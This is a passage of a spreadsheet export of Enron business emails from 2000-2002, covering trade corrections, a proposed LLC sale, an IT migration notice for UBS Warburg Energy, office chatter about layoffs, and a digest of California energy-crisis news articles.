_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 09:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Reliant Q22542 - EOL GD/NYMEX error</t>
  </si>
  <si>
    <t xml:space="preserve">done._x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Larry Joe Hunter @ ECT                           10/18/2000 03:23 PM_x000D_
	_x000D_
_x000D_
To: Errol McLaughlin/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Reliant Q22542 - EOL GD/NYMEX error_x000D_
_x000D_
Errol,_x000D_
_x000D_
Yet another deal in which C/P claims deal should have been NYMEX rather than _x000D_
Gas Daily.  Can you adjust in TAGG?_x000D_
_x000D_
Thanks,_x000D_
Joe_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 09:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I presume that you would just as soon continue to follow this?_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 01/24/2001 05:26 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
01/24/2001 05:26 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Rusty Stevens/Corp/Enron@ENRON, Ben Jacoby/HOU/ECT@ECT _x000D_
_x000D_
Subject: SPA: Illinois Project Entities  _x000D_
_x000D_
Kay:_x000D_
_x000D_
As we discussed, I have been working with a counterparty interested in _x000D_
purchasing one or both of ENA's Illinois development project LLC's.  The _x000D_
counterparty is listed below:_x000D_
  PSEG Americas Development Company, L.L.C._x000D_
  35 Waterview Blvd._x000D_
  Parsippany, NJ  94105_x000D_
_x000D_
The key points of the proposed transaction are:_x000D_
_x000D_
1.  The transaction would be an outright purchase of 100% of the member _x000D_
interests in one or both of the following project entities:_x000D_
_x000D_
 Kendall New Century Development, L.L.C._x000D_
 Titan Land Development Company, L.L.C._x000D_
_x000D_
2.  The purchase price of 100% of the member interests would be:_x000D_
_x000D_
 Kendall New Century Development, L.L.C.: $3,000,000.00_x000D_
 Titan Land Development Company, L.L.C.: $6,000,000.00_x000D_
_x000D_
Lisa Mellancamp was the ENA attorney who handled the CA between ENA and PSEG _x000D_
before Christmas.  At the end of November, Lisa engaged Corey Brown at _x000D_
Bracewell &amp; Patterson to handle the preparation of a draft Securities _x000D_
Purchase Agreement in conjunction with our discussions with Coastal Power.  _x000D_
Corey prepared a draft SPA based upon an option to purchase structure, but _x000D_
Coastal Power backed away from the transaction in early December._x000D_
_x000D_
I have received a letter from PSEG Power LLC indicating their interest in _x000D_
proceeding with a transaction in the near future.  I will forward you a copy _x000D_
of this letter for your records.  They have verbally indicated that the _x000D_
Purchase Price(s) of $3 MM and $6 MM respectively, are acceptable to them._x000D_
_x000D_
I believe that this is the appropriate time to bring you into the process and _x000D_
transfer things from Lisa to yourself.  Please call me to discuss the SPA _x000D_
once you have reviewed the appropriate documents.  I will be in Chicago _x000D_
tomorrow.  I can be reached by cell at (713) 412-4612 or leave me a _x000D_
voicemail.  I will be in the Houston office by noon on Friday._x000D_
_x000D_
Thanks,_x000D_
Fred_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron / HPL Actuals for July 20, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Teco Tap       10.000 / Enron ; 60.000 / HPL IFERC_x000D_
_x000D_
LS HPL LSK IC       30.000/ Enron_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 16:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dan.dietrich@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'chris.stokley@enron.com', 'albert.luc@enron.com', 'cooper.richey@enron.com', 'donna.sheidun@enron.com'})</t>
  </si>
  <si>
    <t>ATTENTION &amp; ACTION: UBS Warburg Energy Pilot Member</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Welcome to the UBS Warburg Energy (UBSWE) Data Migration Pilot! We appreciate your acceptance of our request to be a member of the pilot and want to make you aware of some initial changes that will be in effect when you log into the new environment._x000D_
_x000D_
You will need to log off of your computer, and back in, to receive the changes that have been made. _x000D_
_x000D_
When you logon to your computer, you will use your Enron NT account and password, you will immediately be prompted to change your password (following Enron "password rules")_x000D_
_x000D_
Once you've changed your password and logged off again you will see the UBSWE splash screen which contains the legal disclaimer for using an UBSWE system (this is similar to the Enron splash screen)._x000D_
_x000D_
What won't "change"?_x000D_
Your desktop will look very much the same as it always has_x000D_
Your email will not be affected_x000D_
_x000D_
What will "change"?_x000D_
Your drive mappings to your home and common drives will have changed when you're in the new environment. This will be done automatically, but you should be aware of the following:_x000D_
_x000D_
When you're in the new environment your H:\ drive will contain some UBSWE data, but will not contain your personal data .... (don't worry!) you will find the contents of your Estate H:\ drive in your UBSWE Z:\ drive._x000D_
When you are in the new environment your O:\drive will contain some UBSWE data AND it will contain a directory named M:\Estate and O:\estate which contains links back to all of your M:\and O:\ drive data through the M:\ and O:\ Drive folders_x000D_
When you are in the new environment your P:\ drive (new local common directory) will contain some USBWE data AND it will contain a directory named P:\Estate which contains a link back to all of your legacy local common (i:\ drive for Calgary users) data through the designated folders._x000D_
When you are in the new environment you WILL have access to the applications that you use but these are UBSWE, but  you WILL NOT have access back to the Estate applications. _x000D_
	_x000D_
If you need access to the Estate applications, please contact your local IT support. They will have an "est_" account, with your legacy access rights. Please keep in mind that your "est_" account will only be valid until UBSWE Day 1, and you will have to request an extension of these rights should you need them beyond that date._x000D_
_x000D_
If you have any questions, please contact your local IT support team._x000D_
_x000D_
If you have specific questions regarding the pilot, please contact me at the numbers listed below. _x000D_
_x000D_
Again, we appreciate your assistance in making the UBSWE transition a success!_x000D_
_x000D_
 _x000D_
Regards,_x000D_
_x000D_
Dan Dietrich_x000D_
Office:	 713-345-8836_x000D_
Mobile: 713-569-3651 </t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 09:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: 4/16 Checkout</t>
  </si>
  <si>
    <t xml:space="preserve">BLOOMBERG_x000D_
Are you talking about the broker fee?_x000D_
Yes the fee is $15.00 Flat per Bloomberg's confirmation on both of these _x000D_
deals._x000D_
_x000D_
PREBON_x000D_
Bob said Matt Motley gave him this deal to do. Is that going to fly with _x000D_
Prebon?_x000D_
I guess this is o.k. but they were insisting that this deal was done with _x000D_
Matt not Bob. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                04/16/2001 04:04 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 4/16 Checkout  _x000D_
_x000D_
BLOOMBERG_x000D_
Are you talking about the broker fee?_x000D_
_x000D_
TRADESPARK_x000D_
Matt's contact is verifying this trade as off-peak._x000D_
_x000D_
AMEREX_x000D_
Chris just changed deal 582853 from APB to Amerex_x000D_
_x000D_
582894 - changed to 47.75_x000D_
_x000D_
PREBON_x000D_
Bob said Matt Motley gave him this deal to do. Is that going to fly with _x000D_
Prebon?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
04/16/2001 01:55 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 4/16 Checkout_x000D_
_x000D_
_x000D_
_x000D_
BLOOMBERG_x000D_
_x000D_
deal 582589 and 582423_x000D_
Bloomberg shows fee as $15.00 flat on both of these deals._x000D_
_x000D_
_x000D_
TRADESPARK_x000D_
_x000D_
Matt Motley_x000D_
deal 582856_x000D_
Tradespark shows hours as on-peak not off-peak_x000D_
_x000D_
_x000D_
AMEREX_x000D_
_x000D_
Chris Mallory_x000D_
I am missing:_x000D_
Enron sells to Duke 4/20-4/30 NP-15 Light 25 mw at $190_x000D_
_x000D_
Mike Swerzbin_x000D_
deal 582894_x000D_
Amerex says price should be $47.75 not $47.25_x000D_
_x000D_
_x000D_
PREBON_x000D_
_x000D_
Bob Badeer_x000D_
deal 582668_x000D_
Prebon says this deal should be Matt Motley's_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:01:16 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cecilia.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>I face the one that is on the way up to 6.  I am at 05145._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rodriguez, Cecilia  _x000D_
Sent:	Monday, November 26, 2001 10:00 AM_x000D_
To:	Love, Phillip M._x000D_
Subject:	RE: _x000D_
_x000D_
how close are you tot he escalators?_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Monday, November 26, 2001 9:57 AM_x000D_
To:	Rodriguez, Cecilia_x000D_
Subject:	RE: _x000D_
_x000D_
I will be at my desk for a while if you want to stop by._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rodriguez, Cecilia  _x000D_
Sent:	Monday, November 26, 2001 9:11 AM_x000D_
To:	Love, Phillip M._x000D_
Subject:	RE: _x000D_
_x000D_
Ok. No time frame we are just hanging in there and just waiting like most people.  _x000D_
I already have an offer from a law firm and I'm waiting to hear back from Baylor College of Medicine for_x000D_
the second interview.  So I know I will find something, I just wasn't ready to leave here yet.  Let me know_x000D_
when you are least busy today and I'll come by._x000D_
C_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Monday, November 26, 2001 9:06 AM_x000D_
To:	Rodriguez, Cecilia_x000D_
Subject:	RE: _x000D_
_x000D_
Have they given you guys any time frame?  I am up on five, you get a chance, stop by._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rodriguez, Cecilia  _x000D_
Sent:	Monday, November 26, 2001 9:00 AM_x000D_
To:	Love, Phillip M._x000D_
Subject:	RE: _x000D_
_x000D_
I'm in the new building as well.  We were on of the first groups to move in back Oct.  I'm on 4._x000D_
My group is definitely out the door.  Credit Trading is the name of my group and I think the name speaks for_x000D_
itself....  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Monday, November 26, 2001 8:55 AM_x000D_
To:	Rodriguez, Cecilia_x000D_
Subject:	RE: _x000D_
_x000D_
good idea coming back.  It is a zoo around here.  Looks like D-Day is today.  We will see.  At least I got to move into the new building and see it for a few days.  Where are you currently sitting?_x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rodriguez, Cecilia  _x000D_
Sent:	Monday, November 26, 2001 8:43 AM_x000D_
To:	Love, Phillip M._x000D_
Subject:	RE: _x000D_
_x000D_
I came back the 5th of this month because of what is going on.  I was planning on staying out till Dec. but I figured I better get in here and get my resume updated.  _x000D_
The baby is doing great, thanks for asking._x000D_
I was just bugging like always._x000D_
C</t>
  </si>
  <si>
    <t>Thu, 13 Apr 2000 06:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christopher.spears@enron.com'})</t>
  </si>
  <si>
    <t>Iroq Dispute</t>
  </si>
  <si>
    <t>According to Ed Santa with Iroq, we paid the disputed parking for June 1999 _x000D_
activity and we did not pay $860.00 of expnese in May 1998.  I not concerned _x000D_
about the June 1998.  Would you once again please verify what we paid Iroq on _x000D_
the disputed parking fee from May 1999 through July 1999?_x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 05:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'luanne.giessen@gs.com'})</t>
  </si>
  <si>
    <t>Guaranty Status</t>
  </si>
  <si>
    <t>Luanne:_x000D_
Just wanted to see where things stood from your end on your Guaranty.  We _x000D_
have been asked to consent to an assignment of trades bewteen J Aron and _x000D_
Statoil and would very much like toi finalize the new Master before we give _x000D_
our consent.  Please call me when convenient to discuss._x000D_
Carol</t>
  </si>
  <si>
    <t>Thu, 3 Jan 2002 07:01:20 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Netco P&amp;L's</t>
  </si>
  <si>
    <t>I have given this to O'Neal._x000D_
_x000D_
Tom_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Gossett, Jeffrey C.  _x000D_
Sent:	Wednesday, January 02, 2002 6:56 AM_x000D_
To:	Martin, Thomas A.; Shively, Hunter S.; Neal, Scott; Grigsby, Mike; Arnold, John_x000D_
Cc:	Lavorato, John; Kitchen, Louise_x000D_
Subject:	Netco P&amp;L's_x000D_
_x000D_
Can I get a list of the traders that will make up the new reporting list for the new company as we stand today?  We need to get new books set up, and also we need to get the V@R engine ready to go as well._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 06:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FYI</t>
  </si>
  <si>
    <t xml:space="preserve">and none of them are good :-)_x000D_
_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT, Chad Landry/HOU/ECT@ECT, Matthew _x000D_
Lenhart/HOU/ECT@ECT, Bryan Hull/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, _x000D_
Brian Hoskins/Enron Communications@Enron Communications, Luis _x000D_
Mena/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: FYI_x000D_
_x000D_
With all of the HYPE surrounding the Big 12 this season...._x000D_
_x000D_
Nine SEC teams are going to bowls, an unprecedented number of bowl-bound _x000D_
teams from a single conference in NCAA history._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Jul 2001 03:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgovenar@govadv.com', 'amy.kim@enron.com', 'janet.butler@enron.com', 'alex.parsons@enron.com', 'pat.shortridge@enron.com', 'alan.comnes@enron.com', 'tom.briggs@enron.com', 'mark.schroeder@enron.com', "nick.o'day@enron.com", 'stella.chan@enron.com', 'markus.fiala@enron.com', 'linda.robertson@enron.com', 'peter.styles@enron.com', 'bryan.gottredson@enron.com', 'melinda.pharms@enron.com', 'karen.denne@enron.com', 'ban.sharma@enron.com', 'john.shelk@enron.com', 'michael.brown@enron.com', 'luiz.maurer@enron.com', 'syamane@marathon-com.com', 'robert.neustaedter@enron.com', 'ken@kdscommunications.com', 'marcus.dotson@enron.com', 'chris.holmes@enron.com', 'hgovenar@govadv.com', 'dave.perrino@enron.com', 'rob.bradley@enron.com', 'lipsen@cisco.com', 'jeannie.mandelker@enron.com', 'mona.petrochko@enron.com', 'carin.nersesian@enron.com', 'lora.sullivan@enron.com', 'chris.long@enron.com', 'ralph@censtrat.com', 'michael.tribolet@enron.com', 'shirley.hudler@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'larry.decker@enron.com', 'peggy.mahoney@enron.com', 'rlichtenstein@marathon-com.com', 'joseph.alamo@enron.com', 'jennifer.thome@enron.com', 'steven.kean@enron.com', 'mary.schoen@enron.com', 'lamar.frazier@enron.com', 'kathleen.sullivan@enron.com', 'mike.roan@enron.com', 'shelley.corman@enron.com', 'bryan.seyfried@enron.com', 'filuntz@aol.com', 'kurt.lindahl@enron.com', 'andrew.morrison@enron.com', 'john.sherriff@enron.com', 'bhansen@lhom.com', 'janel.guerrero@enron.com', 'jkradin@marathon-com.com', 'elizabeth.linnell@enron.com', 'roberta.staehlin@enron.com', 'karen.moore@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'lysa.tracy@enron.com', 'mark.palmer@enron.com', 'evan.hughes@enron.com', 'john.neslage@enron.com', 'ann.schmidt@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Please see the following articles:_x000D_
_x000D_
Sac Bee, Fri, 7/27: Hopes dim for a quick Edison deal _x000D_
SD Union, Fri, 7/27: Sempra's trading unit generates a windfall _x000D_
LA Times, Fri, 7/27: Smog Rules May Be Eased_x000D_
LA Times, Fri, 7/27: Federal Caps Didn't Deter Higher Prices_x000D_
SF Chron, Fri, 7/27: Calpine profits double on skyrocketing sales _x000D_
Escalating power prices inspire plant building program _x000D_
SF Chron, Fri, 7/27: Generators continue to set high electricity prices_x000D_
SF Chron, Fri, 7/27: THE ENERGY CRUNCH _x000D_
Environmental suit against power plant _x000D_
Expansion called danger to slough _x000D_
OC Register, Fri, 7/27: Let's make a real deal with Edison  (Editorial)_x000D_
LA Times, Fri, 7/27: California Sempra Continues Improved Results_x000D_
LA Times, Fri, 7/27:  California Calpine Doubles Earnings, Beats Forecasts _x000D_
Energy: San Jose-based company credits higher electricity prices in _x000D_
California and sales from new plants_x000D_
LA Times, Fri, 7/27:  Cap No Bar to Higher Prices Power: Cal-ISO study says _x000D_
suppliers continued to charge as much as five times more than the _x000D_
U.S.-imposed limits_x000D_
WSJ, Fri, 7/27: Calpine Net Soars On Added Plants;_x000D_
Sempra Profit Rises_x000D_
------------------------------------------------------------------------------_x000D_
----------------------------------------------_x000D_
Hopes dim for a quick Edison deal _x000D_
By Kevin Yamamura_x000D_
Bee Capitol Bureau_x000D_
(Published July 27, 2001) _x000D_
The Assembly will not return this week to consider a plan to save _x000D_
California's second-largest utility from bankruptcy, all but ending hopes _x000D_
that legislation would reach Gov. Gray Davis by a mid-August deadline. _x000D_
A group of legislators and Davis staffers has worked this week on an _x000D_
agreement that would restore Southern California Edison's credit and relieve _x000D_
the state of having to purchase energy for the utility. _x000D_
Assembly leaders, who convened the group, set an ambitious schedule that _x000D_
would have led to a vote today had they reached consensus and been able to _x000D_
recall enough of the 80 Assembly members from summer recess destinations. _x000D_
But the newly formed plan, which would issue $2.9 billion in consumer-backed _x000D_
bonds in exchange for several Edison concessions, remains too rough for a _x000D_
vote, said Paul Hefner, a spokesman for Assembly Speaker Robert Hertzberg, _x000D_
D-Sherman Oaks. _x000D_
Hefner was quick to note that Hertzberg has the Assembly "on call" for the _x000D_
scheduled monthlong break and is prepared to ask members to return if a deal _x000D_
comes in the next three weeks. _x000D_
But staff and lawmakers said earlier that organizing a mass return after _x000D_
today would prove nearly impossible because Assembly members are expected to _x000D_
travel throughout the state and beyond. _x000D_
Davis set an Aug. 15 deadline in his original Edison deal and recently said _x000D_
he could call a special session forcing legislators to return if they do not _x000D_
authorize a plan by then. _x000D_
His spokesman, Steven Maviglio, said Thursday the governor is not ruling out _x000D_
that idea but is waiting to see what comes of further legislative _x000D_
discussions. _x000D_
"It's pretty clear that everyone's working pretty hard to form a consensus, _x000D_
but they're just not there," Maviglio said. "The governor is optimistic about _x000D_
the Aug. 15 date." _x000D_
Even so, Edison does not expect a solution by then. Company officials stated _x000D_
earlier this week that they would wait for a political deal at least until _x000D_
lawmakers return Aug. 20. _x000D_
_x000D_
The Bee's Kevin Yamamura can be reached at (916) 326-5542 or _x000D_
kyamamura@sacbee.com &lt;mailto:kyamamura@sacbee.com&gt;. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sempra's trading unit generates a windfall  _x000D_
_x000D_
_x000D_
\_x000D_
objattph _x000D_
By Craig D. Rose  UNION-TRIBUNE STAFF WRITER  July 27, 2001  Sempra Energy, _x000D_
the parent company of SDG&amp;E, reported a 25 percent surge in profit to $137 _x000D_
million last quarter but said yesterday it lost money on the sale of _x000D_
electricity under a long-term contract to California.  On the other hand, _x000D_
Sempra said its largest source of profits was its energy trading unit, a _x000D_
middleman that earned $69 million during the quarter buying and selling _x000D_
energy produced by others.  The results underscore the transformation of _x000D_
relatively simple utility companies into diversified energy holding companies _x000D_
that have learned to profit in new ways from the deregulation of electricity _x000D_
and the turmoil in energy markets.  The surprising announcement -- that a _x000D_
company lost money selling power during California's run-up in electricity _x000D_
prices -- was explained by Sempra as an intentional consequence of the _x000D_
long-term contract it signed with the state to provide power.  Stephen Baum, _x000D_
chairman and chief executive officer of Sempra, said the company agreed to _x000D_
provide a steep discount to California during the summer months but would _x000D_
recoup the losses later in the 10-year deal.  California sought long-term _x000D_
electricity purchase contracts so it could reduce its purchases in daily and _x000D_
near-term power markets, where prices reached record levels.  Critics say _x000D_
Gov. Gray Davis rushed into long-term deals because of concerns about getting _x000D_
through next year's election. They also say the contracts will saddle _x000D_
customers with higher costs for years.  The governor has acknowledged that _x000D_
long-term contracts might cause consumers to pay relatively high prices for _x000D_
electricity in later years, but he maintains it is a fair price to pay for _x000D_
lowering prices that were devastating the state economy.  Michael Shames, _x000D_
executive director of the Utility Consumers' Action Network in San Diego, _x000D_
said the steep discount Sempra provided to the state on power this summer _x000D_
raised questions about the governor's proposal to help San Diego Gas &amp; _x000D_
Electric Co. clear a debt of $750 million.  SDG&amp;E says it is owed that money _x000D_
for power purchases on behalf of its customers.  In a media conference last _x000D_
month, Davis said the agreement would eliminate the threat of a possible _x000D_
balloon payment for consumers, who he said might have faced the so-called _x000D_
balancing account debt as early as next year.  Shames says the proposal, _x000D_
which took the form of a memorandum of understanding, or MOU, is costly for _x000D_
consumers and a bonanza for Sempra.  He said the relatively cheap power _x000D_
provided by Sempra this summer "makes the MOU sound like more of a hidden _x000D_
payback to Sempra than a real relief plan for local ratepayers."  Shames said _x000D_
he will release an analysis of the state's Sempra plan next week. The state _x000D_
Public Utilities Commission is expected to rule on the plan in August.  A _x000D_
Sempra spokesman said there is no connection between discount power and the _x000D_
tentative agreement to clear the $750 million debt. Doug Kline, the Sempra _x000D_
spokesman, said the power contract with the state was signed in early May and _x000D_
the agreement on the balancing account was reached in mid-June.  Sempra _x000D_
Energy Trading, meanwhile, said only 10 percent of its $69 million profit was _x000D_
earned from sales of energy in the western region, which includes California. _x000D_
The trading operation earned $40 million in profit during the comparable _x000D_
period last year.  California's Independent System Operator, which manages _x000D_
most of the state power grid, and other investigators have said trading and _x000D_
bidding strategies were tools used by energy companies to raise prices during _x000D_
the California power crisis.  Though Sempra earned money on trading, its _x000D_
wholesale power generating business lost $9 million during the quarter. Baum _x000D_
said the discounts on electricity provided the state were the prime cause of _x000D_
the loss for Sempra Energy Resources but added that a plant outage also _x000D_
contributed.  Sempra Energy Resources, which co-owns a generating plant near _x000D_
Las Vegas with Reliant Energy, earned $2 million during the second quarter _x000D_
last year.  Baum added that Sempra's long-term contract with the state -- _x000D_
under which it will provide up to 1,900 megawatts -- has allowed its _x000D_
wholesale business to pre-sell about half the power it expects to generate _x000D_
from the Nevada plant, which will be expanded, and three generating _x000D_
facilities it expects to build.  Profits at SDG&amp;E slipped to $37 million _x000D_
during the quarter ended June 30, down from $40 million last year, according _x000D_
to Sempra. SDG&amp;E, whose business is restricted to delivering gas and _x000D_
electricity, said it provided increased customer service during the crisis, _x000D_
which lowered profits.  Wall Street analysts generally applauded Sempra's _x000D_
results, noting that the company was ahead of its plan to generate at least a _x000D_
third of its profits from its newer businesses by 2003.  "They're really two _x000D_
years ahead of schedule for their non-utility businesses," said Brian _x000D_
Youngberg, an analyst with Edward Jones &amp; Co.  Bud Leedom, a San Diego-based _x000D_
analyst with Wells Fargo Van Kasper, said Sempra's move into energy trading _x000D_
now seems shrewd. "We never dreamed they were setting themselves for a _x000D_
windfall like this," Leedom said.  Investors pushed Sempra shares up 17 cents _x000D_
yesterday, to close at $25.49 in trading on The New York Stock Exchange. _x000D_
Bloomberg news service contributed to this report. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Smog Rules May Be Eased_x000D_
Power plants: EPA proposes a sweeping change in how utilities' emissions are _x000D_
curbed, a flexible approach favored by the industry._x000D_
By GARY POLAKOVIC and ELIZABETH SHOGREN_x000D_
Times Staff Writers_x000D_
_x000D_
July 27 2001_x000D_
_x000D_
WASHINGTON -- U.S. Environmental Protection Agency Administrator Christie _x000D_
Whitman proposed sweeping changes Thursday in the regulation of power plant _x000D_
pollution that would replace five of the government's toughest programs with _x000D_
a single, flexible approach favored by utilities._x000D_
_x000D_
Whitman outlined a plan for cleaning up major components of power plant smog _x000D_
that represents a significant departure from the EPA's traditional regulatory _x000D_
dictums. She called for a major expansion of pollution credit trading, which, _x000D_
up to now, has had varying success._x000D_
_x000D_
Under the new plan, the EPA would scrap some of the most stringent measures _x000D_
devised by the agency to deal with power plant emissions. One provision to be _x000D_
set aside aims to cut harmful mercury emissions; another is meant to reduce _x000D_
emissions from Midwestern power plants by 85%; another is designed to restore _x000D_
visibility at national parks._x000D_
_x000D_
Especially unpopular with industry, one measure, known as new source review, _x000D_
requires the installation of advanced pollution controls whenever power _x000D_
plants are expanded or modified. It too would be phased out._x000D_
_x000D_
"New source review is certainly one of those regulatory aspects that would no _x000D_
longer be necessary," Whitman told Sen. George Voinovich (R-Ohio) at the _x000D_
hearing by the Environment and Public Works Committee. "All of those _x000D_
[programs] could be aligned into one regulatory process" that she said would _x000D_
work better than existing rules._x000D_
_x000D_
Whitman's comments offer the first peek into the administration's plans for _x000D_
cleaning some of the dirtiest polluters left in the nation. Debate over the _x000D_
administration's clean-air approach has shifted to Congress as it considers _x000D_
whether to revise the national Clean Air Act._x000D_
_x000D_
The magnitude of the proposed revisions caught environmentalists by surprise _x000D_
but buoyed industry representatives who say existing controls are costly and _x000D_
inefficient._x000D_
_x000D_
"She has raised an appalling prospect of junking virtually every rule and _x000D_
strategy to deal with emissions of electric companies in return for some _x000D_
vague industry-sought plan for an emissions trading scheme," said Frank _x000D_
O'Donnell, executive director of the Clean Air Trust, an environmental _x000D_
advocacy group. "If they go forward with this, it means a wholesale fight _x000D_
over the Clean Air Act in Congress."_x000D_
_x000D_
After the hearing, Whitman stressed that the overall goal is to clean the air _x000D_
more efficiently than current rules do. Although the administration has not _x000D_
yet released a so-called multipollutant cleanup strategy, Whitman contended _x000D_
that collapsing several regulations into one far-reaching approach would be _x000D_
easier for regulators and industry to manage._x000D_
_x000D_
"What we're looking for is targets under this legislation that significantly _x000D_
clean up the air beyond what our current regulatory, statutory requirements _x000D_
would do," Whitman said. She added that new source review, for example, _x000D_
"could potentially be no longer necessary if you have the right kind of _x000D_
targets set in a multi-emissions bill. We have to wait and see where the _x000D_
targets are set."_x000D_
_x000D_
Utilities have lobbied Vice President Dick Cheney's energy task force to _x000D_
prevent the EPA from aggressively enforcing the new source review regulation. _x000D_
Industry and administration officials say the provision is onerous and _x000D_
prevents plant upgrades, although EPA officials say it is a key tool for _x000D_
forcing dirty, old plants to cut emissions by up to 95%._x000D_
_x000D_
During the Clinton administration, federal officials charged that 32 _x000D_
coal-fired power plants in several Southern and Midwestern states ignored a _x000D_
requirement that companies install advanced emission controls when their _x000D_
plants were upgraded. The government reached settlement with three utilities, _x000D_
but a provision in the Bush administration's energy plan stalled those _x000D_
enforcement actions pending a review of power plant controls._x000D_
_x000D_
C. Boyden Gray, attorney for the Electric Reliability Coordinating Council _x000D_
and former White House counsel for the first President Bush in the 1980s, _x000D_
praised the administration's proposal. He said major utility companies he _x000D_
represents, including Southern Co., Duke Energy Co. and the Tennessee Valley _x000D_
Authority, could clean up with greater flexibility and less cost under the _x000D_
plan outlined by Whitman._x000D_
_x000D_
"To put everything in a market-incentives basis is a great step. It would be _x000D_
a real breakthrough and a plus for the business community," Gray said._x000D_
_x000D_
For example, Gray said EPA has four separate measures to control nitrogen _x000D_
oxides from power plant combustion, including programs to cut acid rain, _x000D_
ozone and haze. Another program scheduled to take effect in May 2004 requires _x000D_
power plants in 19 states to cut summer emissions by 1 million tons annually. _x000D_
He said those programs can be confusing and costly and could easily be _x000D_
replaced by a credit-trading program run largely by power companies._x000D_
_x000D_
Under the program being considered by the Bush administration, an emission _x000D_
limit could be established at hundreds of power plants followed by annual _x000D_
reductions in mercury, a toxic metal, as well as smog-forming nitrogen and _x000D_
sulfur oxides._x000D_
_x000D_
However, a provision to reduce carbon dioxide, a gas implicated in global _x000D_
warming, was dropped under industry pressure._x000D_
_x000D_
Power companies that reduce beyond their limits could sell emission credits, _x000D_
which represent a pound of pollution, to companies that exceed their limits._x000D_
_x000D_
Although industry and free-market advocates favor such programs, they are not _x000D_
without controversy. The record of market-driven programs is mixed. On the _x000D_
one hand, the nation's acid rain program uses marketable permits and is _x000D_
widely credited with cutting sulfur oxides at less cost. On the other hand, _x000D_
the world's first market-driven program to tackle urban smog has not worked _x000D_
in Los Angeles, where nearly 400 power companies and manufacturers failed to _x000D_
achieve significant cleanup for the nearly eight years the program has been _x000D_
in effect._x000D_
_x000D_
Further, many environmental groups are wary of market-driven programs because _x000D_
by design they preclude active government intervention. Critics say such _x000D_
programs could potentially limit public review of power plant operations, _x000D_
allow emissions to concentrate in poor communities and slow efforts to cut _x000D_
haze in national parks downwind from plants that elect to buy pollution _x000D_
credits instead of cleaning up._x000D_
_x000D_
The Bush administration's power plant strategy was aired before the Senate _x000D_
Environment and Public Works Committee, which is chaired by Sen. James M. _x000D_
Jeffords (I-Vt.), whose dramatic departure from the GOP threw control of the _x000D_
Senate to the Democrats. Jeffords is proposing legislation, different from _x000D_
the administration's approach, that would control four power plant _x000D_
pollutants, including the greenhouse gas carbon dioxide, an approach rejected _x000D_
by the Bush administration._x000D_
_x000D_
Prospects appear to be increasing that Congress will pass one or more _x000D_
measures designed to reduce carbon dioxide emissions, a belated response to _x000D_
this week's decision by more than 180 countries to deal with the problem _x000D_
without the involvement of the United States._x000D_
_x000D_
Indeed, in recent weeks several members in the GOP-led House and Democratic _x000D_
Senate have voted on bills with the intention of disassociating themselves _x000D_
from President Bush's environmental policies before the next election._x000D_
_x000D_
Among the votes, the House struck down a provision supported by the Bush _x000D_
